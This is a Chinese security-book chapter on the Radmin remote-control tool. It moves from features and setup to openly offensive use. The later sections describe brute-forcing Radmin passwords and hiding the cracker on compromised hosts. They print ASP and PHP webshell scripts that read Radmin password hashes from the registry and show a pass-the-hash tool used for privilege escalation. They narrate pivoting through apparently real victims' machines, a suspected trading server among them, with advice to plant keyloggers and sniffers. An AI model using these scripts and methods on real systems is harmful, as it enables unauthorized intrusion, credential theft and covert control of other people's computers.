7.8 Radmin远控口令攻防全攻略

Radmin是一款世界知名的远程控制软件,其完全控制、文件传输、Telnet命令等功能非常好用。在Radmin 3.0以前的版本中,杀毒软件都不对其进行查杀,后期,由于黑客和病毒大量使用R_server作为媒介,因此将R_server作为安全威胁处理。目前,一些以主动防御为主的杀毒软件及防火墙会主动将R_server列入黑名单。尽管如此,Radmin还是深受网络安全爱好者的喜爱。有关Radmin的研究,国内安全组织有很多文章和软件作品。例如,Radmin Hash连接器只要获取Radmin的密码Hash值,就可以直接进行连接,而不需知道其密码。

本节将从网络攻防的角度介绍Radmin软件。通过本节的学习,读者可以掌握很多有关Radmin攻击和防护的知识。

7.8.1 Radmin简介

“Radmin”是“Remote Administrator”的简称,其官方网站(http://www.radmin.com)的解释为“PC Remote Control Software and Remote Access Software”(PC远程控制和远程访问软件)。Radmin是一款屡获殊荣的远程控制软件,目前新版本为3.4,它将远程控制、外包服务组件及网络监控整合到一个系统里,提供目前为止最快速、最强健且最安全的工具包。

1.主要特点

(1)最高工作速度

Radmin是目前速度最快的远程控制软件,其Direct Screen Transfer?技术采用了视频挂钩内核模式驱动程序,将捕捉率提高到每秒数百次屏幕更新。通过其特别的低带宽优化功能,可以在使用拨号调制解调器和GPRS连接的情况下顺利地工作。

(2)最高安全级别

Radmin以加密模式工作,为所有连接到远程计算机的数据、屏幕图像、鼠标移动和键盘信号采用随机生成的密钥256位AES强加密,而且可以使用Windows Security或Radmin Security。Windows安全性支持对特定用户使用不同的权限,或者对主域、可信域和活动目录的用户组使用不同的权限,支持自动使用登录用户凭证和Kerberos验证。Radmin安全性支持对添加到Radmin Server访问列表中的用户使用不同的权限。Radmin用户验证使用新的基于Diffie-Hellman的密钥交换机制,密钥长度为2 048位。IP Filter仅允许从特定IP地址和网络访问Radmin Server。通过Radmin可以查看添加到日志文件的DNS名称和用户名信息。Radmin提供了智能防护密码猜测机制,5次密码登录错误后自动进行延迟。

(3)硬件支持英特尔®AMT新产品远程控制

Radmin 3.4支持英特尔®AMT(主动管理技术),它允许进行远程计算机控制(即使是关闭或无法启动操作系统)。可以使用Radmin浏览器打开、重新启动和关闭远程计算机。Radmin还能使用户查看和修改远程计算机的BIOS设置,并从本地CD或磁盘映像文件启动远程计算机。

(4)全面兼容Windows 7新功能

Radmin 3.4完全支持Windows 7 32位和64位操作系统,包括用户账户控制和快速用户切换。Radmin 3.4的服务端支持Windows 7/Vista/XP/2008/2003/2000(32位)和Windows 7/Vista/XP/2008/2003(64位)操作系统。Radmin 3.4的浏览器端支持Windows 7/Vista/XP/2008/2003/2000/Me/98/95/NT4.0(32位)和Windows 7/Vista/XP/2008/2003(64位)操作系统。

(5)操作简单,支持多连接

Radmin支持被控端以服务的方式运行,支持多个连接和IP地址过滤(即允许特定的IP地址控制远程机器)、个性化的文档互传、远程关机,支持高分辨率模式、基于Windows NT的安全支持和密码保护,以及提供日志文件等。Radmin目前支持TCP/IP协议,应用十分广泛。

2.软件组成

Radmin分为服务端(Radmin Server)和浏览器端(Radmin Viewer)两个部分,在早期版本中,这两个部分是集成在一起的,在Radmin 3.0以后就将其分开了。浏览器端即Radmin.exe,服务端即早期的R_server.exe。在后续版本中增加了一些功能,服务端的名称也进行了更改。服务端主程序由“R_server.exe”更名为“rserver3.exe”,其安装文件路径由“C:\Program Files\Radmin”变为“C:\ WINDOWS\system32\rserver30”,共有25个主要程序文件。

7.8.2 Radmin的基本操作

下面介绍Radmin的基本操作。

1.安装浏览器端和服务端

Radmin服务端和浏览器端的安装方法很简单,只要按照提示进行操作即可。目前该软件的语言以英语为主。

2.服务端详细设置

01 设置主窗口

依次单击“开始”→“程序”→“Radmin Server 3”→“Setting For Radmin Server”选项,进入Radmin Server设置窗口,如图7-55所示。Radmin Server的所有设置都是通过该窗口完成的。在Radmin 3.0以前的版本中,还可以通过命令行进行设置。

0288-1

图7-55 Radmin Server设置窗口

02 输入注册码

在设置窗口中单击“Enter license”按钮,在弹出的“License Code”对话框中输入注册码,否则在30天试用期结束后,客户端将无法连接服务端,需要输入正确的注册码后才能使用,如图7-56所示。

03 设置Radmin Server选项

在设置窗口中单击“Options…”按钮,会打开一个选项设置窗口,如图7-57所示。在该窗口中,有“General”(普通)、“Miscellaneous”、“IP Filter”(IP地址过滤)、“Language”(语言)、“Chat Options”(聊天选项)和“ Voice Chat Options”(语音聊天选项)六大功能。

0288-2

图7-56 输入注册码

0288-3

图7-57 选项设置窗口

(1)普通设置

在普通设置中,有“Port”(端口)、“Tray icon”(托盘图标)、“Incoming connection dialog”(连接对话框)和“Logging”(日志)四大选项。Radmin Server的默认端口为“4899”,如果需要更改该端口为自定义的未使用端口,可以取消勾选“Use default port”,同时在下面的输入框中输入自定义的端口号。

托盘图标主要用于设置是否在计算机上显示连接图标,默认为显示。该图标一般在任务栏右下角,双击该图标可以查看当前的连接,并显示“Incoming connections are accepted on port 4899”提示信息。在Radmin Server 2.x版本中,可以设置不显示该图标;在Radmin Server 3.x版本中,该图标有两种设置方式,分别是“Show in System Tray”和“Always Show”。

“Incoming connection dialog”选项主要用于设置用户访问许可,有两种方式供用户选择,一种是访问超时后自动拒绝访问,另一种是超时后自动允许访问,默认为第一种方式。在该选项中,可以设置Timeout的默认时间,默认为10秒。一般情况下,可以将该时间修改得长一些,如100秒。

“Logging”选项主要用于记录错误日志和访问日志。在日志下方,用户可以根据实际情况选择记录“All errors”、“No errors”、“Critical errors”、“Medium errors”和“Small errors”这5种错误之一。选中“Use Event Log”选项表示记录使用事件日志,选中“Use Logfiles”选项表示记录用户登录日志。在默认情况下,日志记录文件为C:\WINDOWS\ system32\rserver30\Radm_log.htm,用户可以根据实际情况重新设定记录日志文件的位置及名称。日志设置完毕,客户端连接或者服务端启动等信息都会详细记录在Radm_log.htm文件中。如图7-58所示,该文件就记录了Radmin Server的具体情况。

0289-1

图7-58 日志详细记录

(2)“Miscellaneous”设置

“Miscellaneous”设置非常有用,如图7-59所示,需要禁用哪个功能,就选中该功能前的复选框即可。在“Disable connection mode”(禁用连接模式)设置区中有如下9个选项。

(3)IP地址过滤设置

IP地址过滤,顾名思义,就是允许指定的IP地址或者IP地址范围访问。设置该功能后,从网络上能够看到4899端口开放,却无法通过Radmin客户端连接访问。如图7-60所示,在“IP Filter”设置中勾选“Enable IP Filter”复选框,接着单击“Add”按钮,添加允许的IP地址或者IP地址范围。对于已经添加的IP地址或者范围,如果不再使用或者不再允许访问,只要选中后单击“Remove”按钮将其移除即可。

0290-1

图7-59 Miscellaneous设置

0290-2

图7-60 设置IP过滤

(4)语言设置

尽管Radmin官方声称支持多种语言,但实际测试中发现并非如此,也许是因为缺少相应的语言文件吧。语言设置很简单,需要使用哪种语言,就选择哪种语言。

(5)聊天选项设置

在Radmin 3.2及后续版本中加入了聊天功能,主要用于控制端与被控制端之间的交流。如图7-61所示,如果使用聊天功能,则可以设置服务端聊天显示的昵称,在“Nick name”文本框中输入昵称即可,默认昵称是“user”,在“User information”文本框中可以填写简单的用户介绍。在Radmin中,还可以对聊天界面的外观进行设置,如图7-62所示,可以设置聊天文字样式等。

0291-1

图7-61 聊天设置

0291-2

图7-62 设置聊天外观

在“Additional”(附加)选项中,可以设置是否显示自己的昵称、每一条消息发送的时间戳,是否对聊天发起方连接及断开的确认,是否允许使用特殊的命令,以及是否记录聊天日志等,如图7-63所示。

(6)语音聊天设置

语音聊天设置与聊天设置类似,如图7-64所示,唯一不同的是需要设置声卡设备。

0291-3

图7-63 聊天附加选项设置

0291-4

图7-64 语音聊天设置

04 安全许可设置

Radmin中的“Permissions”是最重要的设置之一。在Radmin主窗口单击“Permissions”选项,打开“Radmin Server Security Mode”对话框,如图7-65所示。该对话框提供了两种安全设置,一种是“Radmin Security”,另一种就是“Windows NT Security”。单击选中需要使用的安全设置,然后单击“Permissions”按钮,进入详细设置界面。

0292-1

图7-65 选择安全模式

(1)“Radmin Security”安全模式

0292-2

图7-66 设置Radmin Security安全模式

在“Radmin Security”安全模式中,需要添加用户。如图7-66所示,单击“Add User”按钮添加一个用户后,再进行详细设置。如果是完全访问,则勾选“All Access”复选框即可,否则应根据实际需要进行选择。一共有如下10种权限供用户选择。

(2)“Windows NT Security”安全模式

0292-3

图7-67 Windows NT Security设置

选择“Windows NT Security”设置后,将按照Windows用户域模式进行安全管理。如图7-67所示,单击“添加”按钮,从Windows用户管理器中添加一个用户,然后在“Administrators的权限”设置区中进行设置。使用“Windows NT Security”安全模式时,结合Windows文件权限管理进行更加细致的设置,即可以授予用户特别的权限。

7.8.3 Radmin的使用

打开“Radmin Viewer”窗口,如图7-68所示,该界面是Radmin客户端管理主界面,对Radmin服务端的所有操作都能在这个界面中完成。“Radmin Viewer”窗口有一个英文菜单和工具栏,工具栏中各按钮的功能依次为连接一个地址、新建一个连接、删除连接地址、查看地址属性、屏幕完全控制、屏幕浏览、Telnet、文件传输、关闭计算机、聊天、语音聊天、发送消息、选择图标浏览方式、以文件夹方式浏览、查看在线计算机。在Radmin Viewer中是通过IP地址来进行管理的。

1.新建连接

在“Radmin Viewer”窗口依次单击“Connection”→“New Connection”选项,或者在工具栏中单击第二个图标,即可在Radmin客户端中打开新建连接窗口。如图7-69所示,在“IP address or DNS”文本框中输入IP地址或者DNS地址,“Name of entry”文本框中显示的是在“Radmin Viewer”窗口中显示的名称,如果是新建连接,不需要输入该名称,默认是IP地址的名称。在本例中,输入的IP地址为192.168.209.130,端口使用默认的4899。设置完成后,就会在Radmin客户端中以IP地址进行显示。

0293-1

图7-68 Radmin客户端管理主界面

0293-2

图7-69 新建一个连接

2.Telnet连接服务端

在Radmin客户端管理界面中,选中刚才新建的IP地址192.168.209.130,然后单击右键,在弹出的快捷菜单中选择“Telnet”选项。如果客户端和服务端可以连接,就会立刻出现一个登录窗口,如图7-70所示,要求输入用户名和密码,在此输入先前创建的用户和密码。在登录过程中会显示登录的一些信息,如图7-71所示。

0294-1

图7-70 Radmin安全验证

0294-2

图7-71 登录连接信息

Radmin有两种安全验证方式,一种是Radmin的方式,另一种是Windows的方式。当登录验证通过后,就会出现我们熟悉的Telnet界面,如图7-72所示。该界面与DOS界面类似,可以执行各种DOS命令,还可以保存显示的内容到本地文件。

0294-3

图7-72 使用Telnet

3.文件传输

文件传输,顾名思义,就是文件的上传与下载。Radmin文件传输的使用方式与Telnet方式类似,打开后的初始界面如图7-73所示,单击其中的盘符即可像在资源管理器中一样浏览文件,文件传输的目的地必须是具体的磁盘。通过“Radmin Viewer”窗口,可以在本机和服务端上创建、删除、修改文件。

0294-4

图7-73 文件传输

4.远程屏幕监控

远程屏幕监控,换句话说就是完全控制服务端计算机。单击工具栏上的第五个图标,或者依次单击“Mode”→“Full Control”选项,即可使用远程屏幕监控。密码验证通过后,如图7-74所示。当使用屏幕控制后,在Radmin主窗口中即可对服务端(被控制计算机)进行各种操作,就像在本地操作计算机一样。

0295-1

图7-74 远程屏幕监控

5.聊天与发送短消息

相对Radmin强大的控制功能来说,其聊天与发送短消息功能就像是赠品,方便管理员进行管理与交流。依次选择“Mode”→“Chat”选项,如图7-75所示,界面与QQ聊天界面类似。Radmin发送消息就是一个信使。选择需要发送的计算机IP地址,依次选择“Mode”→“Send Message”选项,即可发送短消息,如图7-76所示。当客户端发送后,服务端很快就能收到短消息。

0295-2

图7-75 通过Radmin聊天

0295-3

图7-76 发送和接收短消息

6.Intel AMT技术

Radmin 3.2及后续版本提供了Intel AMT技术,声称可以实现冷启动、BIOS远程控制和网络启动。该功能的使用如图7-77所示,选择需要使用该技术的IP地址,并选择相应的功能即可。

0296-1

图7-77 使用Intel AMT技术

总而言之,Radmin是一款不错的远程管理工具,功能强大,速度也比较快。通过上面的介绍,即使是一个菜鸟也可以很快明白应该如何操作Radmin。赶快动手在自己的虚拟机中搭建一个环境,玩玩“控制与被控制”的游戏吧。

7.8.4 Radmin口令暴力破解

网上基本找不到有关Radmin口令暴力破解的工具。笔者在国外论坛查阅资料时偶然得到了一款有关该软件口令破解的工具。

1.Radmin破解文件分析

我们一起分析一下Radmin破解文件。

(1)文件组成

0296-2

图7-78 Radmin破解程序密码字典

该暴力破解软件共有4个文件,分别是password.txt、radmin.exe、radmin.nfo、radmincracker.exe。password.txt为密码字典文件,该文件可以手动修改,每个密码为单独一行,使用“记事本”程序打开后,如图7-78所示,其中包含5个密码,第一个密码为空,后面的密码依次是“radmin”、“password”、“letmein”和“admin”,该密码文件即Radmin服务端的连接密码。radmin.exe是服务端管理器,即客户端,通过radmin.exe可以连接Radmin服务端。radmin.nfo是用于查看系统信息的文件,具体功能笔者也不太清楚。radmincracker.exe是Radmin密码破解程序。

注意

在以上文件中,radmin.exe和password.txt的文件名不能更改,否则将导致程序无法运行。

(2)Radmin口令破解命令格式

使用UltraEdit软件直接编辑radmincracker.exe,使用二进制格式查看,radmincracker.exe的命令格式为“radmincracker.exe ip ip ip”,如图7-79所示。在DOS提示符下输入“radmincracker.exe”并运行,也会提示其命令格式。

0297-1

图7-79 获取Radmin破解程序的具体运行命令

(3)测试环境的搭建

在虚拟机中建立两个Windows XP操作系统(A系统和B系统),在A系统中安装Radmin 2.2,在B系统中将Radmin口令破解软件放到“Tools”文件夹下。A系统的IP地址为192.168.209.130。

2.实际测试

了解Radmin破解文件之后,就可以着手进行实际测试了。

(1)环境测试

测试环境搭建成功后,还需要进行网络连通性测试,即使用ping命令对A系统进行网络测试。将sfind.exe复制到B系统中,使用“sfind -p 192.168.209.130”语句查看A系统中对外端口的开放情况,如果结果中未看到4899端口开放,可能有两个原因:一是被防火墙拦截;二是Radmin软件的安装设置存在问题。可以关闭Windows防火墙或者在防火墙例外列表中添加4899端口为允许端口,然后重启A系统或者在命令提示符下使用“net start r_server”命令启动Radmin服务端。同时,需要设置A系统中Radmin服务端的连接密码为“password”。

(2)口令破解测试

在DOS提示符下输入“radmincracker 192.168.209.130”,按下“回车”键开始破解,如图7-80所示。在DOS提示符下会给出IP地址和密码的列表,当找到匹配的密码后会给出结果,在本例中显示的结果为“192.168.209.130: password successfully opened”。破解成功后,破解程序会自动Telnet被破解的Radmin服务端,也就是说,Radmin客户端是通过Telnet方式连接的。

0298-1

图7-80 口令破解测试

3.破解后续处理及技巧

Radmincracker破解程序在破解Radmin密码成功后会自动在当前文件夹下生成一个TXT文件,文件以被破解的IP地址命名,如图7-81所示,在该文件中显示格式为“IP地址:密码”。

0298-2

图7-81 破解结果

Radmin破解技巧

(1)radmincracker.exe破解程序在破解时占用系统资源较多,因此,在破解时密码字典不宜太大,每一次破解密码字典以小于100KB为佳。

(2)破解时最好在服务器上运行破解程序。

(3)在肉机上可以使用一些第三方程序将当前窗口隐藏,隔一段时间查看破解结果文件即可。

(4)破解IP地址不宜设置太多。当Radmin破解成功后会自动Telnet连接其服务端,连接过多会影响网络,需要在线进行处理。

总的来说,这款软件还是不错的,破解难度取决于密码字典的选取。感兴趣的读者可以到安天365论坛(http://www.antian365.com)下载该软件。

7.8.5 Radmin在渗透中的妙用

Radmin在渗透中的妙用主要在提权。在获得Radmin的Hash值后,无须破解Radmin的密码即可正常使用Radmin。

1.利用Radmin提权

很多Web服务器为了管理方便,都会安装一些远程控制软件进行系统和应用程序的维护。当我们通过SQL注入等方式获得WebShell后,一旦发现系统安装了Radmin软件,那么一个比较快捷的方法就是获取Radmin的Hash值和端口等信息,然后通过Radmin_hash客户端连接工具直接连接,从而达到提权的目的。

在Radmin 2.x中,其参数设置信息均保存在注册表“HKEY_LOCAL_MACHINE\ SYSTEM\RAdmin\v2.0\Server\Parameters”键值下,如图7-82所示。

0299-1

图7-82 Radmin 2.x版本参数在注册表中的保存位置

“Parameter”是默认密码保存值,“Port”是默认端口保存值。而Radmin 3.x更改了加密方式,分为NT用户安全和Radmin安全模式,具体体现在键值上,示例如下。

在Radmin 3.x中,其密码信息保存在名称为“1”的键值中。由于“1”是数字,因此,目前还没有找到成功通过脚本读取该值的方法。下面介绍如何读取Radmin 2.x中的参数信息。

2.获取Radmin的有关信息

(1)通过radmin.asp获取

将以下代码保存为radmin.asp文件,并将其放在网站目录中。

<%  
Set WSH= Server.CreateObject("WSCRIPT.SHELL")  
RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\"  
Parameter="Parameter"  
Port = "Port"  
path="LogFilePath" 
ParameterArray=WSH.REGREAD(RadminPath &amp; Parameter )  
Response.write "The Result of Radmin Hash"  
Response.write "</br>" 
Response.write ""  
Response.write Parameter&amp;":"  
If IsArray(ParameterArray) Then  
For i = 0 To UBound(ParameterArray)  
If Len (hex(ParameterArray(i)))=1 Then  
strObj = strObj &amp; "0" &amp; CStr(Hex(ParameterArray(i)))  
Else  
strObj = strObj &amp; Hex(ParameterArray(i))  
End If  
Next  
response.write Lcase(strobj)  
Response.write "</br>" 
Else  
response.write "Error! Can't Read!"  
End If  
Response.write ""  
IF Port<>"" then 
PortArray=WSH.REGREAD(RadminPath &amp; Port ) 
 
If IsArray(PortArray) Then  
Response.write Port &amp;":"  
Response.write 
hextointer(CStr(Hex(PortArray(1)))&amp;CStr(Hex(PortArray(0))))  
Response.write "<br>" 
Else  
Response.write "Error! Can't Read!"  
End If  
else 
   Response.write "Port is defualt 4899!"     
end if 
Rpath=WSH.REGREAD(RadminPath &amp; path )  
Response.write"日志文件存储地址位:" 
Response.write Rpath 
Response.write "<br>" 
Function hextointer(strin)  
Dim i, j, k, result  
result = 0  
For i = 1 To Len(strin)  
If Mid(strin, i, 1) = "f" or Mid(strin, i, 1) ="F" Then  
j = 15  
End If  
If Mid(strin, i, 1) = "e" or Mid(strin, i, 1) = "E" Then  
j = 14  
End If  
If Mid(strin, i, 1) = "d" or Mid(strin, i, 1) = "D" Then  
j = 13  
End If  
If Mid(strin, i, 1) = "c" or Mid(strin, i, 1) = "C" Then  
j = 12  
End If  
If Mid(strin, i, 1) = "b" or Mid(strin, i, 1) = "B" Then  
j = 11  
End If  
If Mid(strin, i, 1) = "a" or Mid(strin, i, 1) = "A" Then  
j = 10  
End If  
If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then  
j = CInt(Mid(strin, i, 1))  
End If  
For k = 1 To Len(strin) - i  
j = j * 16  
Next  
result = result + j  
Next  
hextointer = result  
End Function  
 
%>  

直接访问该文件,即可读取Radmin的有关信息,如图7-83所示,获取了如下信息。

0302-1

图7-83 获取Radmin的有关信息

(2)通过radmin.php获取

服务器可能会使用PHP脚本语言,那么使用radmin.asp文件就无法读取其相关信息了。这时要想读取Radmin的信息,只要将以下代码保存为radmin.php文件即可,方法与保存radmin.asp文件类似,效果如图7- 84所示。

<?php 
$shell = new COM("WScript.Shell") or die("This thing requires Windows 
Scripting Host"); 
$rootkey = "HKEY_LOCAL_MACHINE\\SYSTEM\RAdmin\\v2.0\\Server\\Parameters\\"; 
$Parameter = "Parameter"; 
$Port = "Port"; 
$logpath = "LogFilePath"; 
$myparam = $shell->RegRead($rootkey.$Parameter); 
$myport = $shell->RegRead($rootkey.$Port); 
$path = $shell->RegRead($rootkey.$logpath); 
echo "radmin hash is:"; 
foreach($myparam as $a){ 
echo dechex($a); 
} 
echo "<br>"; 
echo "radmin port is :".hexdec(dechex($myport[1]).dechex($myport[0])). 
"<br>"; 
echo "radmin log path is:$path<br>"; 
echo "please clean the log" 
?> 
0303-1

图7-84 通过radmin.php获取Radmin参数值

注意

(1)在使用radmin.asp或者radmin.php文件读取服务器中的Radmin参数信息时,有可能会由于权限问题而无法读取。

(2)radmin.asp和radmin.php文件只能用于读取Radmin服务端3.0以下版本,对于Radmin 3.0以上版本的读取无能为力。Radmin 3.x系列是对Radmin 2.x系列的完全升级,注册表、安装程序位置及名称都进行了调整,在同一个系统中,可以同时安装Radmin 2.x和Radmin 3.x。Radmin 3.x版本的有关参数在键值中的位置及名称等信息如图7-85所示。在Radmin 3.x中,其加密方式已经进行了变更,在Ntusers键值下的“1”中保存的值是80位,而在Radmin Security中其数值数据位数更多,达到1 170位,猜测其密码位数为1 024,而多余的位数则可能是用户名称等信息保存的位数。

0304-1

图7-85 Radmin 3.x参数在注册表中的位置

(3)如果初始安装Radmin未对参数进行设置,则读取的参数信息相对较少。

3.使用Radmin-hash连接工具

使用Radmin-hash工具相对就简单多了。将上面获取的Radmin 32位Hash值、IP地址和端口记下,打开Radmin-hash,新建一个IP地址连接,然后像使用正常的Radmin客户端管理器一样进行操作,如图7-86所示,输入获取的32位Hash值。密码验证通过后即可使用Telnet、屏幕监控及文件传输,如图7-87所示。

0304-2

图7-86 使用使用Radmin-hash连接工具连接服务端

0304-3

图7-87 通过Radmin-hash客户端管理服务端

7.8.6 利用Radmin口令进行内网渗透控制

Radmin作为一款强大的远程控制软件,深受管理员喜爱。但是,很多管理员都有一个习惯,就是将Radmin的口令设置为同一个口令。通过键盘记录及Radmin客户端可以很容易和方便地实施内网渗透。

1.查看肉机上的Radmin客户端

在Radmin客户端中,如果需要连接服务端,则必须要建立一个连接,也就是需要一个IP地址和端口号,否则就不能使用。当建立一个连接以后,就会在Radmin客户端中保留以该IP或者指定显示名称的记录。

依次单击“开始”→“程序”→“Remote Administrator v2.2”→“Radmin Viewer”选项,打开Radmin客户端。如果用户曾经使用Radmin客户端管理Radmin服务端,则会在Radmin客户端中显示,如图7-88所示。

0305-1

图7-88 Radmin客户端中的服务端计算机

2.通过Radmin客户端建立连接

在Radmin客户端中新建一个连接,其IP地址设置为如图7-89所示的地址,端口选择其相应的端口。例如,选择IP地址“192.168.0.15”,根据肉机上Radmin客户端的记录,该地址对应的端口(Port)为“5003”,然后选中“Connect through host”复选框,选择该肉机的Radmin地址。该IP地址(肉机的IP地址)将作为内外网连接的桥梁,如果内网的计算机安装了Radmin服务端,只要拥有该内网计算机的Radmin控制口令,即可实施全面控制。

0305-2

图7-89 通过肉机的Radmin地址连接内网

3.尝试建立连接

按照以上步骤,依次为肉机Radmin客户端中的内网Radmin服务端计算机创建连接,然后依次选择内网计算机进行连接尝试。在本例中,选择IP地址为192.168.0.11的计算机,在Radmin客户端中选择“屏幕查看”选项,双击进行连接。输入肉机的Radmin控制口令尝试连接,如果内网计算机安装了Radmin服务端,则需要输入密码2次,一次为肉机的Radmin的口令,一次是内网计算机的Radmin口令。输入正确的口令后,才可以执行相应的操作。在本例中,可以看到该内网计算机为监控计算机,如图7-90所示。

0306-1

图7-90 连接内网计算机

4.通过Telnet查看IP地址

在本例中,肉机有外网IP地址,也有内网IP地址,其内网IP地址为192.168.0.105。当通过肉机连接内网的计算机时,在内网计算机上显示的网络连接为内网的IP地址。“192.168.0.102”为内网中的一台计算机,该计算机上的Radmin服务端开放的端口为5000,在本地Radmin客户端选择“Telnet”选项,然后双击“192.168.0.102”选项,输入密码,进入Telnet管理界面,输入“netstat -an”命令查看网络连接,如图7-91所示,该网络连接中显示的Radmin连接为内网连接。

0306-2

图7-91 查看网络连接

5.再次实施内网渗透攻击

通过上面的步骤和获取的信息,我们成功测试了2台内网计算机。在该内网计算机上安装ARP挂马软件或者Sniffer软件,可以获取系统中的一些密码。另外,直接通过IE及邮件密码获取软件可以很方便地获取其相应的密码,以便再次进行攻击。

6.小结

本案例通过查看已经控制的肉机的Radmin客户端,对其内网的Radmin服务端进行口令尝试攻击,使用肉机的Radmin口令登录内网计算机上的Radmin服务端,一旦口令正确,则可以完全控制该内网计算机。该方法简单、有效。

7.8.7 利用Radmin口令进行外网渗透控制

利用Radmin口令除了可以进行内网渗透,还可以进行外网渗透,其原理与内网渗透类似,下面通过实际操作进行讲解。

1.查看肉机上的Radmin客户端

依次单击“开始”→“程序”→“Remote Administrator v2.2”→“Radmin Viewer”选项,打开Radmin客户端,在其中可以看到一个“187”标签。选择“187”标签,可以在Radmin客户端界面底部看到其对应的IP地址为“*.*.*182”,端口号为“2100”,控制模式为“Full Control”,如图7-92所示。

2.通过Radmin客户端建立连接并查看远端屏幕

在本地Radmin客户端中新建一个连接,其IP地址设置为“*.*.*182”,端口为“2100”。在Radmin客户端中选择“屏幕监视”选项,输入得到的密码进行尝试,密码验证成功后,即可进入屏幕监视状态,查看远端计算机的屏幕了,如图7-93所示。

0307-1

图7-92 Radmin客户端中的服务端计算机

0307-2

图7-93 查看肉机屏幕

3.查看IP地址

在本地Radmin客户端中选中刚才的IP地址,选择“Telnet”选项,进入Telnet操作模式,输入“IPconfig /all”命令查看该计算机的网络配置情况,该计算机的IP地址为独立外网IP地址,如图7-94所示。

0308-1

图7-94 查看计算机网络情况

技巧

在Radmin客户端连接状态下,如果是Radmin 3.0及以上版本,可以直接通过工具条上的小图标进行功能的切换,不需要每次输入Radmin控制密码。

4.通过Telnet查看外网情况

在本例中,该计算机的IP地址为外网IP地址,可以通过“net view”命令查看附近网络的情况。如图7-95所示,该网络附近还有许多计算机。

0308-2

图7-95 查看外网情况

5.再次实施外网渗透攻击

再次利用前面的步骤和获取的信息,依次查看网络中开放2100端口的计算机,用已经获取的Radmin口令测试该网络中的外网计算机,成功控制了3台计算机,其中一台为服务器,且疑似为交易服务器,如图7-96所示。

0309-1

图7-96 再次实施内网渗透

技巧

在写作本案例时,笔者偶然看见以前的一幅截图,里面有18台计算机,均是通过Radmin进行管理的,如图7-97所示。如果在该计算机上安装键盘记录或者Cain等嗅探软件,可以很容易地获取Radmin等软件的账号和密码。管理员一旦形成一种习惯,就会坚持这种习惯,因此,在网络攻防中对细节的收集和利用往往会有一些意想不到的收获!

0309-2

图7-97 通过Radmin管理网络

6.小结

本例通过查看已经控制的肉机的Radmin客户端,获取其管理员管理其他计算机时所用的Radmin服务端IP地址和端口,并通过获取的Radmin口令对管理员管理的Radmin服务端进行口令尝试攻击,口令正确率在50%左右(即使不正确,还可以通过键盘记录等手段嗅探或者记录管理员在计算机上的操作,从而获取更多的口令和控制更多的外网计算机)。本例方法简单,获取的肉机质量较高。